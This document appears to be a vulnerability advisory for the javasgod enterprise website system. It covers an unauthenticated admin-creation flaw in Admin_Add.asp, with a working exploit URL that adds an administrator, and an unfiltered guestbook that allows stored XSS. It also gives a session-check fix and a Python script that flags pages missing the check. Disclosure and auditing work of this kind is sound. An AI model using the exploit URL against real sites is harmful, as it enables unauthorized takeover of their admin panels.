Affected Versions: javasgod free enterprise website building system V1.0.1
Source code: http://www.mycodes.net/25/5242.htm
① Add an administrator without verification
Vulnerability file: Admin_Add.asp
Vulnerability code:
<!--#include file=".../../config/conn.asp"-->
<!--#include file="md5.asp"-->
<%
' The save action runs without first checking Session("admin")
If Request.QueryString("action") = "save" Then
    uid = Replace(Trim(Request("uid")), "'", "")
    realname = Replace(Trim(Request("realname")), "'", "")
    pwd1 = Replace(Trim(Request("pwd1")), "'", "")
    pwd2 = Replace(Trim(Request("pwd2")), "'", "")
    password = md5(pwd1)
Cause: the data is written directly, without any verification.
Exploitation: construct a URL
http://www.bkjia.com/source/admin/Admin_Add.asp?action=save&uid=test&realname=test&pwd1=123456&pwd2=123456
This adds an administrator account with the username test and the password 123456.
Solution: add a check at the top of the page
' Reject the request unless an administrator session exists
If Session("admin") = "" Then
    Response.Write "<script language='javascript'>alert('network timed out or you have not logged on yet!');window.location.href='login.asp';</script>"
    Response.End
End If
② Message book XSS vulnerability
Vulnerability file: Message.asp
Vulnerability code:
If Request.QueryString("action") = "save" Then
    ' Every field is only trimmed; nothing is filtered or encoded before it is stored
    username = Trim(Request("username"))
    email = Trim(Request("email"))
    tel = Trim(Request("tel"))
    zhiwu = Trim(Request("zhiwu"))
    city = Trim(Request("city"))
    qq = Trim(Request("qq"))
    add = Trim(Request("add"))
    title = Trim(Request("title"))
    content = Trim(Request("content"))
    messageip = Request.ServerVariables("REMOTE_ADDR")
    Set rs = Server.CreateObject("adodb.recordset")
    rs.Open "select * from consumer_message", conn,
Cause: the input is not filtered, so it can still be executed in the admin back end.
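For issue ①, the session check only helps if every admin page runs it before touching request data, and if it ends with Response.End. The following is an added example, not part of the original advisory or the product's code: a Python heuristic that flags ASP sources which read Request input without a preceding Session("admin") check. The sample sources and all file names except Admin_Add.asp are constructed, and the check is assumed to live in the page itself (included files are not followed).

```python
import re

# Session check from the page's fix: If Session("admin") = "" Then ... Response.End
GUARD = re.compile(r'\bif\s+session\s*\(\s*"admin"\s*\)\s*=\s*""\s*then\b', re.I)
END = re.compile(r'\bresponse\s*\.\s*end\b', re.I)
# Client-controlled input: Request(...), Request.QueryString/Form/Cookies(...)
INPUT = re.compile(r'\brequest\s*(?:\.\s*(?:querystring|form|cookies)\s*)?\(', re.I)
COMMENT = re.compile(r"^\s*(?:'|rem\b).*$", re.I | re.M)  # whole-line VBScript comments

def missing_guard(src):
    """True if the page reads request input before an effective session check."""
    code = COMMENT.sub("", src)
    first_input = INPUT.search(code)
    if first_input is None:
        return False                      # page handles no client input
    guard = GUARD.search(code, 0, first_input.start())
    if guard is None:
        return True                       # no check, or check placed after the input
    # Without Response.End the script keeps running after the alert/redirect.
    return END.search(code, guard.end(), first_input.start()) is None

def audit(pages):
    """Return the sorted names of pages (name -> source) that lack the guard."""
    return sorted(name for name, src in pages.items() if missing_guard(src))

# Constructed samples modelled on the Admin_Add.asp excerpt and its fix.
VULNERABLE = '''If Request.QueryString("action") = "save" Then
uid = Replace(Trim(Request("uid")), "'", "")
'''
GUARD_BLOCK = '''If Session("admin") = "" Then
Response.Write "<script>alert('not logged on');window.location.href='login.asp';</script>"
Response.End
End If
'''
SAMPLES = {
    "Admin_Add.asp": VULNERABLE,                                   # as shipped
    "Admin_Fixed.asp": GUARD_BLOCK + VULNERABLE,                   # fix applied
    "Admin_NoEnd.asp": GUARD_BLOCK.replace("Response.End\n", "") + VULNERABLE,
    "Admin_Late.asp": VULNERABLE + GUARD_BLOCK,                    # check after input
}

if __name__ == "__main__":
    print(audit(SAMPLES))
```

Treat a hit as a prompt for manual review, since a page may legitimately get its check from an include file.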